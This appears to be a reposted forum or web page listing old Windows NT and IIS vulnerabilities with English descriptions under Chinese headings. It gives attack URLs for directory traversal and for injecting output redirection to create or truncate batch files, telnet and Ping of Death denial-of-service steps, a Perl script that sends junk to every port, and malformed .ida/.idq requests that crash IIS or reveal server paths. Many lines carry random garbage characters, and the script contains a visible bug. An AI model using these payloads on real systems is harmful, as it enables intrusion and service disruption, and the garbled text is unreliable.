NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
1 @7 E' @! s: C/ i* [2 i/ L9 i- wA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

! \8 [+ U5 r  r1 V0 m4 j* NBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

! p6 X/ |# I, e4 T4 G3 A; y& q/ P--------------------------------------------------------------------
/ x0 [  U) \3 I% S! B( k
% e3 T/ F( a1 k* c% T受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

* c( z4 u9 }% s% FIf the file 'target.bat' exists, the file will be truncated.

! k8 q2 ^; v' y: s  G1 k
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
+ z& w: a8 H2 g' d
9 M7 Q  k8 }9 t8 ZThe following steps;

6 ^2 X4 Y2 U  c9 y8 P* A. ETelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
/ w& H6 x9 |2 @3 D6 d0 T  A& Cresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
1 U9 y5 t5 B& [5 f0 N
% F. T$ J. W. j" e. l" DWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
7 ~' b, m3 G; Y/ C' @
$ Q) h! g" {- B- Z; Y' P- cThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
& I  F/ \7 ?& ?! H' \0 q
' P# d  P5 d- z* J, H  lIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

" l( u0 ]5 F4 R4 C, LThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

3 M6 t2 E& S4 k3 L/*begin poke code*/

9 S: N# h  \7 o7 S7 iuse Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;

* t8 X5 o! |2 P/ \3 ?4 I$verbose = 1; # tell me what you're hitting
4 ~- |5 P: J* y0 E/ V$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{


& {  |* c6 b; e7 {, e, [8 Qif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
' n$ N' R" S' H. ^6 H0 m+ h" }next;
9 W# D9 e5 G4 M4 t}
" L! b  k$ w6 |8 s( H& a# b; S$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
# Y7 v; A& h9 k+ ~9 `+ T! P# t3 }}
chat::close($fh);
" e, X8 Q6 C% a0 r7 p7 w8 V
}

& ^& y, e4 |5 W7 X# F3 F
/*end poke code*/
$ B( Y0 L4 x' C8 P8 ?
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

" o! x& y# X' @9 j4 cThis attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
* e5 `" C) ~+ R  \
--------------------------------------------------------------------------------

5 T1 g4 ^9 w% n3 F3 X+ E8 ?受影響系統(tǒng):3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
: Q0 y1 b' n6 |
1 A6 O; B( [8 o4 T* u5 OSTOP: 0X0000001E
1 D% n5 q# f* G! E0 EKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

, {; s$ G+ \, k: w& `6 f-OR-
' m8 y5 ~. `" M. n2 p$ d) p  l! q
; ]4 F2 p9 S- `+ iSTOP: 0x0000000A
" ^" X. l8 H! f1 h. S3 n, kIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

' T$ n+ C. W% A+ INT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
& p" _+ S  i/ E; h9 s; u9 @
2 p+ d& x5 j6 L* k+ n--------------------------------------------------------------------------------
, B  V# `8 S1 J+ G4 j6 n
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
4 K$ p( j! c# J6 |7 {
" U& r1 q- i! z# q--------------------------------------------------------
4 M0 k9 \/ U' ?2 N( U* ?5 q! Q1 P
( C# x, u! ^# q6 G: w( ^% CIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server